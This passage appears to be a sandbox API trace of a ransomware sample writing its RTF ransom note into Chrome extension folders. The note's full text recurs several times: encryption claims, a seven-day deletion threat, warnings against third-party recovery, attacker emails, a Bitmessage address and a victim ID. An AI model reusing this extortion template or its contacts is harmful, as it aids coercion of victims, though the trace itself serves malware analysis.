thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.261] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.262] CloseHandle (hObject=0x2c8) returned 1 [0280.262] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\#readme_eman#.rtf")) returned 0xffffffff [0280.262] GetLastError () returned 0x2 [0280.262] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK 